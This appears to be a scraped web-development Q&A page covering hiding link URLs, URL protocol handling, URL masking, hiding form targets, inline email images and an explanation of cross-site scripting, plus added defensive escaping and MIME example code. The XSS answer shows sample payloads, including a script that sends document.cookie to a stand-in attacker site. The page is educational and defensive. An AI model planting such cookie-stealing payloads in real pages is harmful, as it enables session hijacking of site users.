html link: hide href from user - html

In an HTML file that is sent to someone by e-mail, is it possible to prevent the receiver from inspecting the href of a link in that HTML file?
I need to prevent the user from seeing/copying the url.

You can't. It is entirely impossible.
The email client and the browser are both entirely under the control of the user (so you can't give them a URL without also giving it to the user).
Tricks might obfuscate the URL, but decoding it is trivial.

Related

Add protocol to inputted URL in a user-friendly way

I'm trying to make a text input for an external link so that I can make an anchor tag that navigates somewhere.
URL WITHOUT protocol
URL WITH protocol
But when people naturally type 'www.bing.com', I get a URL without protocol, which works like navigating on the current site.
I can make a regex pattern asking the user to input an absolute link (prefixed with protocol, such as 'http://....' or 'https://...'), but is there a more user-friendly way to fix the problem?

XSS: Rewrite the content of the HTML page?

Regarding XSS, OWASP states (intro paragraph):
"These scripts can even rewrite the content of the HTML page"
As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their html files, which clearly no user without specific server access can do.
When I cannot do it as a user, how can a maliciously injected script from facebook.com, executed by my browser, possibly rewrite the contents of facebook.com?
"As a user, I cannot rewrite the contents of facebook.com"
You could if Facebook didn't protect well against XSS. Sites that don't escape user-generated text for usage in the context of HTML are vulnerable to having arbitrary script injected into the page. Your Facebook post could contain a <script> tag, for example.
"That would require me to permanently alter their html files, which clearly no user without specific server access can do."
No, you could simply modify the page client-side once your malicious script is loaded. No need to actually modify the original page to have the effect of wiping out the page. For example:
document.body.innerHTML = '';
Let me give an example. Let's imagine Facebook lets its users save a link to an externally hosted avatar in the user's profile. And this avatar is shown near the user's nickname. Also let's imagine that Facebook does not protect itself against XSS (it really does, but we need this assumption).
Then the attacker can use text like this instead of an avatar link:
javascript:alert('You are hacked')
Facebook's HTML code displaying the avatar may look like this:
<img src="javascript:alert('You are hacked')"></img>
Then the attacker will see that alert when he opens his profile. Doesn't look very dangerous, does it?
But take care: Facebook has a news feed. Let the attacker write some post, and all his friends will see the alert on their news feed page.
And to finish: instead of the alert, the attacker will be able to get the user's Facebook cookies and send them to the attacker's site:
<script>window.location = 'attackerssite.com?cookie=' + document.cookie</script>
And then he'll collect the victim's cookies from his server's access log. Now it is a real hazard, do you agree?
Note: Here I described stored XSS: it is probably the most dangerous type of XSS that can affect many users at once. The other types of XSS (described in other answers to this question) may affect the current user, but that doesn't mean they are not dangerous: for example, they can steal the user's cookies as well.
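The defence the answers above point to (escaping user-generated text for the HTML context, and accepting only http(s) URLs for the avatar link), shown next to the vulnerable rendering. This is an added example, not code from the original answers; the function names, the default avatar path and the sample post are assumptions constructed for illustration.

```javascript
// Added example, not code from the answers; names and sample data are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape text for use in HTML element content or inside a quoted attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const DEFAULT_AVATAR = '/static/default-avatar.png'; // hypothetical fallback path

// Accept only absolute http(s) URLs; javascript:, relative and unparsable input fall back.
function safeAvatarUrl(input) {
  let url;
  try {
    url = new URL(String(input).trim());
  } catch {
    return DEFAULT_AVATAR;
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : DEFAULT_AVATAR;
}

// Vulnerable: user-controlled values are concatenated into the markup unchanged.
function renderPostUnsafe(post) {
  return `<div class="post"><img src="${post.avatar}"><p>${post.text}</p></div>`;
}

// Hardened: the URL scheme is allowlisted and every value is escaped for its context.
function renderPostSafe(post) {
  return (
    `<div class="post"><img src="${escapeHtml(safeAvatarUrl(post.avatar))}">` +
    `<p>${escapeHtml(post.text)}</p></div>`
  );
}

// Constructed sample post reusing the two payload shapes quoted on this page.
const samplePost = {
  avatar: "javascript:alert('You are hacked')",
  text: "<script>document.body.innerHTML = '';</script>",
};
```

Marking the session cookie HttpOnly keeps it out of document.cookie, which limits the cookie-collection step described above but does not stop an injected script from rewriting the page.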

How to mask a URL via HTML or .htaccess

I am setting up a website that I want no one to know the URL for. For example, I send them a link that actually goes to the page, but the URL in the bar at the top has a completely different URL that I don't own. I'm not sure if this can be done in PHP, HTML, or the .htaccess file.
This is not possible, unless
you control the systems of the visitors (then you could, for example, change their DNS servers), or
you find and exploit a bug in the browser/system.
You can make a link anchor text look like it leads to a specific domain not under your control, but the real URL will be used in any case. Example: http://wikipedia.org/.

Hiding ASP file name from HTML

I have an HTML form:
<form id="form" action="Secret.asp" method="POST">
This form sends data from my website visitor to a database.
I want to hide it so that whoever sees my HTML will not be able to send data to my ASP file.
Or maybe there is another way to block an ASP file from anyone but the HTML file?
I suppose you could set up a default document on a virtual directory, and set the action to that. Then your user wouldn't see the page name, but the form data would still get posted.
The bigger question is... why do you want to do this? If it's a matter of security through obscurity, this is the wrong approach. Whatever page receives the form data should not trust it at all, and should sanitize anything going into a database anyway.
No.
If you want browsers to be able to send data to a URL, then you have to tell them what that URL is.
Anything you tell a browser, you tell to the user in control of that browser.
No matter what you do, anyone can see their own HTTP requests going out to your server.
If you press F12 on Chrome or Firefox you can see your incoming and outgoing traffic, so it's useless to try and do anything about it.
If you want to secure something, that's not the way to go about it.

ensuring HTML emails always show images

I have an email sent out in my application, and in the HTML of that email, I have an <img> tag which is an image and a link.
The problem is that in most cases the image doesn't load in emails, unless you enable the viewing of embedded images.
That image is an important part of the email. Is there any way I can replace the image tag with something else which always loads in emails? The desire is that users don't have to explicitly click on show pictures to see it.
Absolutely... you can embed the image as an attachment, and then use the CID header in the mail MIME to reference it (instead of a URL to a web resource).
There is no way to guarantee that an image will be displayed without explicit permission of the user. That would circumvent the whole concept if it were possible. The idea is to protect the user from exposure to undesirable content. In the event you were to find some hack way around it, it would be considered just that, and could get you blacklisted once the hack is discovered.
Is the img tag just a reference to an external image that's hosted somewhere? You could try adding it to the email as an embedded resource and see if that helps. Some mail clients may still ask permission before displaying it, though. But it should get more of the target audience.
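The message structure the CID answer above describes, as an added example that is not from the original answers: a multipart/related mail whose HTML part refers to the attached image by Content-ID. The addresses, boundary, link target and image bytes are constructed placeholders, and the function names are assumptions.

```javascript
// Added example; addresses, boundary and image bytes are constructed placeholders.
const CRLF = '\r\n';

// Header values must not contain CR or LF, or a caller could inject extra headers.
function headerValue(value) {
  if (/[\r\n]/.test(value)) throw new Error('CR/LF not allowed in header value');
  return value;
}

// Base64 body wrapped at 76 characters per line.
function base64Lines(buf) {
  return (buf.toString('base64').match(/.{1,76}/g) || []).join(CRLF);
}

// Build a multipart/related message: the HTML part points at the image part by Content-ID.
// The cid is a constant chosen by the sender, not user input.
function buildInlineImageMail({ from, to, subject, cid, image, boundary }) {
  const html = `<html><body><a href="https://example.com/"><img src="cid:${cid}" alt="Logo"></a></body></html>`;
  return [
    `From: ${headerValue(from)}`,
    `To: ${headerValue(to)}`,
    `Subject: ${headerValue(subject)}`,
    'MIME-Version: 1.0',
    `Content-Type: multipart/related; type="text/html"; boundary="${boundary}"`,
    '',
    `--${boundary}`,
    'Content-Type: text/html; charset=utf-8',
    '',
    html,
    `--${boundary}`,
    'Content-Type: image/png',
    'Content-Transfer-Encoding: base64',
    `Content-ID: <${headerValue(cid)}>`,
    'Content-Disposition: inline; filename="logo.png"',
    '',
    base64Lines(image),
    `--${boundary}--`,
    '',
  ].join(CRLF);
}

// Constructed sample: the 8-byte PNG signature stands in for real image data.
const sampleMail = buildInlineImageMail({
  from: 'app@example.com',
  to: 'user@example.com',
  subject: 'Welcome',
  cid: 'logo@example.invalid',
  image: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]),
  boundary: 'example-boundary-001',
});
```

Because the image travels inside the message, no remote fetch is needed to show it, though as the other answers note, some mail clients may still ask permission before displaying it.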